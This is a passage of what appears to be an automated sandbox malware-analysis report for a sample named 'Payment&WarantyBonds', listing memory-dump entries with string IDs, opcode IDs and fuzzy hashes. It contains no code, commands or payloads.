                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: PreferredUILanguages
                                                                                                                                                                                • API String ID: 0-1884656846
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: kLsE
                                                                                                                                                                                • API String ID: 0-3058123920
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: #
                                                                                                                                                                                • API String ID: 0-1885708031
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Actx
                                                                                                                                                                                • API String ID: 0-89312691
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LdrCreateEnclave
                                                                                                                                                                                • API String ID: 0-3262589265
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d686f3a2f037ab38aac0c39c961fa5a31b2761911578b610ae45547775e238c5
                                                                                                                                                                                • Instruction ID: aca3495a3c3f6d4f781c3e3b1930ee7824ac73d98d521d6c14820bf11254c928
                                                                                                                                                                                • Opcode Fuzzy Hash: d686f3a2f037ab38aac0c39c961fa5a31b2761911578b610ae45547775e238c5
                                                                                                                                                                                • Instruction Fuzzy Hash: 9EC166701083418FE764DF19C484BAFB7E4BF98708F44492EE989873A1E774E949CB92
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9e49197f93b1aef2ac257319aa74fd804aca01a96e3107e7d39d761c0b60c4fc
                                                                                                                                                                                • Instruction ID: 5cf982fd2be13364c63af923ff312b34c3453443ccf5187f88c65b1fe0e6c0da
                                                                                                                                                                                • Opcode Fuzzy Hash: 9e49197f93b1aef2ac257319aa74fd804aca01a96e3107e7d39d761c0b60c4fc
                                                                                                                                                                                • Instruction Fuzzy Hash: 66A1F731E006159FFB22EF59C848BAEBBA4BB05724F050167EA10BB3B1D7789D45CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3a223a4381575135e6425d78a639324694abd7c5f3cc89090cd8bf7c01b9bf82
                                                                                                                                                                                • Instruction ID: d760d726b2646ada2c4ce4ba5b57d56b68a7c74f595d1d526c3873aef44e9eb7
                                                                                                                                                                                • Opcode Fuzzy Hash: 3a223a4381575135e6425d78a639324694abd7c5f3cc89090cd8bf7c01b9bf82
                                                                                                                                                                                • Instruction Fuzzy Hash: 04A1B270B016169BDB25CF69C590BAAB7B9FF54318F00402FEA05973A1EB34E812CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 85859eb59cdf7a85a22f9c6e715e3728d6c2f771dc6d48110fe28836dd0e5e02
                                                                                                                                                                                • Instruction ID: 795e0cf6e45645426e9e0b54d1725bed9cd8c4d9b6bf068d080e0de4370fe91c
                                                                                                                                                                                • Opcode Fuzzy Hash: 85859eb59cdf7a85a22f9c6e715e3728d6c2f771dc6d48110fe28836dd0e5e02
                                                                                                                                                                                • Instruction Fuzzy Hash: 9BA1CC72A04212AFD712DF18C980B6BB7E9FF58714F09092EE6499B761CB74ED01CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 41ad645ef7890b8e96f4b592202e27dd1b6154baab126263b06dbb4595a11bdd
                                                                                                                                                                                • Instruction ID: dfc146b99fffea5599a5aab798e895c0ccc53260ccf901b1e5b395553f18e047
                                                                                                                                                                                • Opcode Fuzzy Hash: 41ad645ef7890b8e96f4b592202e27dd1b6154baab126263b06dbb4595a11bdd
                                                                                                                                                                                • Instruction Fuzzy Hash: AD91E872D00216AFDB11DF69D890B7EBFB5AF58310F5B405AE610AB360D734D9018BA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d6829ebf5eb2cab6cc902fbc0ee978c3dbab87858a674e94c55daed868891a35
                                                                                                                                                                                • Instruction ID: c84e9dccc9f8fe3511b794a9fdcc8e71f0dad9e1c5aa7bcad3d1abc3e9855f50
                                                                                                                                                                                • Opcode Fuzzy Hash: d6829ebf5eb2cab6cc902fbc0ee978c3dbab87858a674e94c55daed868891a35
                                                                                                                                                                                • Instruction Fuzzy Hash: 11910431A02616DBEB25EB59C444B7EBBA1EFEC714F05406BE905AB3A0E734D902CB51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5abcdbd5d1f5bb7dbdec70c1015afdd6cebaffe603114e076b9a0d7f1fd84634
                                                                                                                                                                                • Instruction ID: 4b67ec349df71918ce6428a03b9a254703d4f551ef9a30d01d8cd440ad7fed3c
                                                                                                                                                                                • Opcode Fuzzy Hash: 5abcdbd5d1f5bb7dbdec70c1015afdd6cebaffe603114e076b9a0d7f1fd84634
                                                                                                                                                                                • Instruction Fuzzy Hash: 40B112B15083418FD355CF28C580A6ABBF1BB88704F58496EF999D7362D330E985CB52
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                                                                                                                • Instruction ID: 5b85569d646b3330db0cf87b9e1cf956d3b1b21a3f82ad526b8ea9b0b0e802ea
                                                                                                                                                                                • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                                                                                                                • Instruction Fuzzy Hash: 9C717D39A0021A9BDF10CE69C4A0ABFBBF5FF56740F5B415BE940AB261E334D9418B90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                                                                                                • Instruction ID: 0ec16887f71931b6ea103fbd03bba0f054fba49fb320a2d8175497d643326b61
                                                                                                                                                                                • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                                                                                                • Instruction Fuzzy Hash: AC819C72E001168BEF15EF9CC9807AEBBB2EB94314F19816BC915B73A0D6319946CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d35f9af75da7e431705f40a239584bd2f71f048154d0c3f2861d5533b4e88515
                                                                                                                                                                                • Instruction ID: 7d5c9cedc523dd3fc931f1f107afc815c8e3b8da2a728453c3080bf35a98b880
                                                                                                                                                                                • Opcode Fuzzy Hash: d35f9af75da7e431705f40a239584bd2f71f048154d0c3f2861d5533b4e88515
                                                                                                                                                                                • Instruction Fuzzy Hash: F7817D71A00609EFDB65CFA9C880AEEFBBAFF48354F10442EE555A7221D770AD05CB60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                                • Instruction ID: 6f0add81e3ae3600b79122699f5caa60d78a0d50abbb38837cb3e0c1b4e922a3
                                                                                                                                                                                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                                • Instruction Fuzzy Hash: 21717171D00619AFDB10DFAAC984EDEBBB9FFA8700F51456AE505E7260DB34EA01CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8ab2f245ded64e8c726dbcaa5220feac9d6f6917afda6e6e4f9f7e735873e516
                                                                                                                                                                                • Instruction ID: fcc564156a1969303f5d3924874e7f3feb2f0527f9e40a24ef68425b34d502dd
                                                                                                                                                                                • Opcode Fuzzy Hash: 8ab2f245ded64e8c726dbcaa5220feac9d6f6917afda6e6e4f9f7e735873e516
                                                                                                                                                                                • Instruction Fuzzy Hash: 8671F432200B01AFE732DF19C884F96BBA6EF54724F16452EE6158B2B0D779E945CB60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 89dcc87fdd5ccc788312390b6980961ce2ce8e2c040e529521ec92643970d9a7
                                                                                                                                                                                • Instruction ID: 5cef5248a0fa7f13b03df759188f4d33625f7193c4448ee9787afdedd3506f54
                                                                                                                                                                                • Opcode Fuzzy Hash: 89dcc87fdd5ccc788312390b6980961ce2ce8e2c040e529521ec92643970d9a7
                                                                                                                                                                                • Instruction Fuzzy Hash: A7818F75A00205DFCB09CF59C494AAEBBF1FF58301F1581AAD859EB355D734EA41CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 59b5357c093f2a2abc36b046bd76d058d4cc3e51a4f9de11f1f20f9031b65e06
                                                                                                                                                                                • Instruction ID: d6956ddf237802663560069bb7e887a935acea12ead1973446c10cae470cdaaa
                                                                                                                                                                                • Opcode Fuzzy Hash: 59b5357c093f2a2abc36b046bd76d058d4cc3e51a4f9de11f1f20f9031b65e06
                                                                                                                                                                                • Instruction Fuzzy Hash: 7D61E3B1600616AFD715CF69C888BABBBE8FF98315F00461EF959873A0DB30E515CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d2a967238f106d591410b06aebfb2e711fa49726dabd8bcca6233f4b26c26933
                                                                                                                                                                                • Instruction ID: 32831374c5bca192422f3a0f67ff59e05dd955bae6c3253605fb6457f771279a
                                                                                                                                                                                • Opcode Fuzzy Hash: d2a967238f106d591410b06aebfb2e711fa49726dabd8bcca6233f4b26c26933
                                                                                                                                                                                • Instruction Fuzzy Hash: 4A612A716087428BE711CF69C458B6BBBE0FFA4309F18486EE9958B3E1D735D806C781
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 66d772491a529f50c80be7d048e660eb7039e76462e3e50cee69dbfc3ea6c7a4
                                                                                                                                                                                • Instruction ID: 8454f67d8a77dc30578f5465f72f9086e4ca3fc75c6463ad52251eaedcc44ff9
                                                                                                                                                                                • Opcode Fuzzy Hash: 66d772491a529f50c80be7d048e660eb7039e76462e3e50cee69dbfc3ea6c7a4
                                                                                                                                                                                • Instruction Fuzzy Hash: 9A4123316406019BD7269F2AD890B2ABBB4FF54724F11842FE9199B3B5DB709C11CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 65c7f3ba2b3816035b083109f0dd46306bb108031799ef648eb5b4486455e901
                                                                                                                                                                                • Instruction ID: 810d5431bc47b15df1a81bcd9d72adccd6b907e4f60a84c5601aeda69e42922b
                                                                                                                                                                                • Opcode Fuzzy Hash: 65c7f3ba2b3816035b083109f0dd46306bb108031799ef648eb5b4486455e901
                                                                                                                                                                                • Instruction Fuzzy Hash: 4451D6B16142419FE731EF65C881F6B7BA8EBA5724F10062EF921972B1D730D845CBA2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                                                                                                                                                • Instruction ID: 747404f10d047cc43f25dc77630817cb98fb92ea1c935f1d34fed9833ed99c52
                                                                                                                                                                                • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                                                                                                                                                • Instruction Fuzzy Hash: A951DB76A003439BDF119FA98C4097F7FA5EFA8644F04046BFA48C7271E634D856C7A2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: def91eef14799fcf35fc1cfa40e07b03e5ae2fd67696267b75e34e5b001ed76d
                                                                                                                                                                                • Instruction ID: 602054cc692de91c8b3da73d5a586fedb8bbd51e31b615823aebcbd27e1f9a80
                                                                                                                                                                                • Opcode Fuzzy Hash: def91eef14799fcf35fc1cfa40e07b03e5ae2fd67696267b75e34e5b001ed76d
                                                                                                                                                                                • Instruction Fuzzy Hash: FE518371D01209AFEB21AFA5CC41BAEBBB8FF15304F20412FE554A71A1D7719945EF11
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: daff921d29d69d87ff9f93a6b69501835253c7237be1eabf19c49b757cdb33ba
                                                                                                                                                                                • Instruction ID: 1e0ba9d5663db96b6273577a68afd4412988b19740e2569104bf1984d3af3da4
                                                                                                                                                                                • Opcode Fuzzy Hash: daff921d29d69d87ff9f93a6b69501835253c7237be1eabf19c49b757cdb33ba
                                                                                                                                                                                • Instruction Fuzzy Hash: 8D51D230A00616AFEB16EB68C844B7EBBB5BF64716F20416FD512973B0DB749942CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 710169d2d7ee39cab4aee769a2c9f0630bd2f1e237eed8d46bb5ad5605b0c53b
                                                                                                                                                                                • Instruction ID: 76ef97e18d045e44853e82df7094603ccd9924cf7af82bb3dfd70f1e524627eb
                                                                                                                                                                                • Opcode Fuzzy Hash: 710169d2d7ee39cab4aee769a2c9f0630bd2f1e237eed8d46bb5ad5605b0c53b
                                                                                                                                                                                • Instruction Fuzzy Hash: 8A516C71200A05EFDB22DFAAC980E6AB7B9FF68754F40046FE95197271D734EA41CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                                • Instruction ID: 05893762fbaea78ffd5f1d6250403e44634b9e0fb72fef99ba42ab7f607c385e
                                                                                                                                                                                • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                                • Instruction Fuzzy Hash: E0518D71E0021AABEF15DF98C440BEEBBB5AF45354F08406AEA05AB360D734DD45CBA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: eff831578098e7c7bf6ea21a19d79c557e75a72dead134bd6cee6b8155ac5ad0
                                                                                                                                                                                • Instruction ID: 55d75c56a7e4bf17941e9e931028b2ebe03b77ac47487b53b9a0b58db7aa1059
                                                                                                                                                                                • Opcode Fuzzy Hash: eff831578098e7c7bf6ea21a19d79c557e75a72dead134bd6cee6b8155ac5ad0
                                                                                                                                                                                • Instruction Fuzzy Hash: FF418F31200B45DFD722DF29C491BDB7BE9EB59754F05482EE6598B360C7B4E848CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                                                                                                • Instruction ID: 98ca41f77008bf9761068b2db46a08e9e3704886594eb49b53f580da74f83902
                                                                                                                                                                                • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                                                                                                • Instruction Fuzzy Hash: B131D431A082429FFB21DA1DC80076BBA95AB95750F08852BF5958F3A5D674CC41C7A2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a2eeafefab9f71f406085f0449eae680459c466f34a386d1d71cf09d344b592c
                                                                                                                                                                                • Instruction ID: 8cd5b87866c9209ed65100fda55924b30637419205c691163284cb58b854a6b9
                                                                                                                                                                                • Opcode Fuzzy Hash: a2eeafefab9f71f406085f0449eae680459c466f34a386d1d71cf09d344b592c
                                                                                                                                                                                • Instruction Fuzzy Hash: 3531E475A00116EBDB15EF98CC44BAEB7F9FB58741F46416AE900AB254D770ED00CBA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 12737d07548b1cb3f8afaf9623cb565b20675190f6b48aa5d560e06a6ca4da14
                                                                                                                                                                                • Instruction ID: 298b2db2cdbbbedcd9605969304d67d67575be1657e349c3d42f53af7894b108
                                                                                                                                                                                • Opcode Fuzzy Hash: 12737d07548b1cb3f8afaf9623cb565b20675190f6b48aa5d560e06a6ca4da14
                                                                                                                                                                                • Instruction Fuzzy Hash: A831F671640212EBDB13DF9AC854B6FB7F9AFA4315F02006EE505DB362DA70DD018790
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ef6366ca9fde3134beacfb3c8ca30bb00fe2a443b86038a15edf8912b9dd9e72
                                                                                                                                                                                • Instruction ID: 3e2ddbb070d55e4f42564a58bd1c4c374a949374b2ce950afcd2c8a2d0a5d44f
